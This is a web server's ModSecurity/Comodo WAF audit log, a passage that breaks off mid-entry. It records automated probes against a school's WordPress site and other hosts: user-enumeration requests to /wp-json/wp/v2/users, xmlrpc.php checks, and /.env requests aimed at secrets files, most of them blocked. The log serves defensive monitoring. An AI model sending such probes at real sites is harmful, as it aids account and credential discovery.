Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f64632b-Z-- --e0099f39-A-- [10/May/2025:13:15:57 +0700] aB7vHRLuBiaF9R054QBf-wAAAA0 103.236.140.4 34898 103.236.140.4 8181 --e0099f39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.121 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e0099f39-C-- demo.sayHello --e0099f39-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0099f39-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746857757753342 5302 (- - -) Stopwatch2: 1746857757753342 5302; combined=3951, p1=498, p2=3235, p3=30, p4=33, p5=92, sr=71, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0099f39-Z-- --c7718055-A-- [10/May/2025:13:16:00 +0700] aB7vIBLuBiaF9R054QBf_QAAAAA 103.236.140.4 34902 103.236.140.4 8181 --c7718055-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.233 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c7718055-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7718055-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746857760725778 1839 (- - -) Stopwatch2: 1746857760725778 1839; combined=909, p1=304, p2=578, p3=0, p4=0, p5=26, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7718055-Z-- --843ec442-A-- [10/May/2025:13:16:04 +0700] aB7vJBLuBiaF9R054QBf_wAAAAY 103.236.140.4 34906 103.236.140.4 8181 --843ec442-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.233 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --843ec442-C-- demo.sayHello --843ec442-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --843ec442-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746857764879133 4876 (- - -) Stopwatch2: 1746857764879133 4876; combined=3777, p1=481, p2=3097, p3=24, p4=25, p5=89, sr=67, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --843ec442-Z-- --13916619-A-- [10/May/2025:13:17:41 +0700] aB7vhRLuBiaF9R054QBgAgAAAAI 103.236.140.4 34918 103.236.140.4 8181 --13916619-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --13916619-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13916619-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746857861337119 2707 (- - -) Stopwatch2: 1746857861337119 2707; combined=1100, p1=374, p2=701, p3=0, p4=0, p5=25, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13916619-Z-- --f1103425-A-- [10/May/2025:13:17:45 +0700] aB7viRLuBiaF9R054QBgBAAAAA4 103.236.140.4 34922 103.236.140.4 8181 --f1103425-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.126 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f1103425-C-- demo.sayHello --f1103425-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1103425-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746857865613156 5128 (- - -) Stopwatch2: 1746857865613156 5128; combined=4074, p1=477, p2=3386, p3=28, p4=32, p5=88, sr=68, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1103425-Z-- --2b93e709-A-- [10/May/2025:13:20:06 +0700] aB7wFhLuBiaF9R054QBgEgAAAA4 103.236.140.4 34964 103.236.140.4 8181 --2b93e709-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.152 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2b93e709-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b93e709-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746858006275377 3292 (- - -) Stopwatch2: 1746858006275377 3292; combined=1415, p1=486, p2=897, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b93e709-Z-- --0b9d8643-A-- [10/May/2025:13:20:10 +0700] aB7wGhLuBiaF9R054QBgFAAAABc 103.236.140.4 34968 103.236.140.4 8181 --0b9d8643-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.152 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0b9d8643-C-- demo.sayHello --0b9d8643-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b9d8643-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746858010779886 4565 (- - -) Stopwatch2: 1746858010779886 4565; combined=3630, p1=435, p2=2998, p3=22, p4=25, p5=88, sr=65, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b9d8643-Z-- --7ae5f74f-A-- [10/May/2025:13:22:41 +0700] aB7wsauC4AqLGUOyzyX_UgAAAJg 103.236.140.4 34982 103.236.140.4 8181 --7ae5f74f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.7 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7ae5f74f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ae5f74f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746858161716857 3084 (- - -) Stopwatch2: 1746858161716857 3084; combined=1316, p1=457, p2=825, p3=0, p4=0, p5=34, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ae5f74f-Z-- --de0be361-A-- [10/May/2025:13:22:48 +0700] aB7wuKuC4AqLGUOyzyX_VAAAAIY 103.236.140.4 34986 103.236.140.4 8181 --de0be361-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.7 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --de0be361-C-- demo.sayHello --de0be361-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --de0be361-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746858168840270 6263 (- - -) Stopwatch2: 1746858168840270 6263; combined=4404, p1=568, p2=3574, p3=38, p4=35, p5=109, sr=82, sw=80, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de0be361-Z-- --6dae653d-A-- [10/May/2025:13:29:06 +0700] aB7yMhLuBiaF9R054QBgIAAAAAI 103.236.140.4 35048 103.236.140.4 8181 --6dae653d-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 164.92.244.132 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 164.92.244.132 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --6dae653d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6dae653d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746858546399844 699 (- - -) Stopwatch2: 1746858546399844 699; combined=228, p1=197, p2=0, p3=0, p4=0, p5=31, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6dae653d-Z-- --de870716-A-- [10/May/2025:13:29:14 +0700] aB7yOtr9PbfRBMhzxmRfSgAAAEI 103.236.140.4 35066 103.236.140.4 8181 --de870716-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.130.110.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.130.110.182 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --de870716-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de870716-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746858554808619 3108 (- - -) Stopwatch2: 1746858554808619 3108; combined=1434, p1=466, p2=936, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de870716-Z-- --ff76d74b-A-- [10/May/2025:14:10:58 +0700] aB78Atr9PbfRBMhzxmRf4AAAAEY 103.236.140.4 37418 103.236.140.4 8181 --ff76d74b-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 46.101.111.185 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 46.101.111.185 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --ff76d74b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff76d74b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746861058909548 708 (- - -) Stopwatch2: 1746861058909548 708; combined=305, p1=265, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff76d74b-Z-- --e6fe8317-A-- [10/May/2025:14:18:01 +0700] aB79qdr9PbfRBMhzxmRh4AAAAFE 103.236.140.4 46540 103.236.140.4 8181 --e6fe8317-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 65.20.181.225 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 65.20.181.225 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e6fe8317-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6fe8317-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746861481232162 3134 (- - -) Stopwatch2: 1746861481232162 3134; combined=1396, p1=460, p2=905, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6fe8317-Z-- --8f8d272d-A-- [10/May/2025:14:40:16 +0700] aB8C4Mi6w7GTj2w44Z6pqAAAAM4 103.236.140.4 45062 103.236.140.4 8181 --8f8d272d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.38.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.38.136 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8f8d272d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f8d272d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746862816683576 3652 (- - -) Stopwatch2: 1746862816683576 3652; combined=1608, p1=494, p2=1055, p3=0, p4=0, p5=59, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f8d272d-Z-- --2e7d966e-A-- [10/May/2025:14:40:19 +0700] aB8C48i6w7GTj2w44Z6pqQAAAMo 103.236.140.4 45136 103.236.140.4 8181 --2e7d966e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.38.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.38.136 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2e7d966e-C-- demo.sayHello --2e7d966e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e7d966e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746862819700714 6492 (- - -) Stopwatch2: 1746862819700714 6492; combined=5015, p1=642, p2=4140, p3=36, p4=43, p5=91, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e7d966e-Z-- --3cbbde7f-A-- [10/May/2025:14:46:54 +0700] aB8EbquC4AqLGUOyzyUJ0QAAAIs 103.236.140.4 53020 103.236.140.4 8181 --3cbbde7f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3cbbde7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3cbbde7f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746863214843867 2631 (- - -) Stopwatch2: 1746863214843867 2631; combined=1342, p1=432, p2=881, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3cbbde7f-Z-- --4828e856-A-- [10/May/2025:14:46:58 +0700] aB8EchLuBiaF9R054QBsyAAAAA0 103.236.140.4 53104 103.236.140.4 8181 --4828e856-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.187 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4828e856-C-- demo.sayHello --4828e856-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4828e856-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746863218471337 5364 (- - -) Stopwatch2: 1746863218471337 5364; combined=4220, p1=510, p2=3480, p3=33, p4=36, p5=96, sr=74, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4828e856-Z-- --251ce073-A-- [10/May/2025:14:48:02 +0700] aB8EsquC4AqLGUOyzyUKFQAAAIk 103.236.140.4 54396 103.236.140.4 8181 --251ce073-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.96 X-Forwarded-Host: smkn22-jkt.sch.id 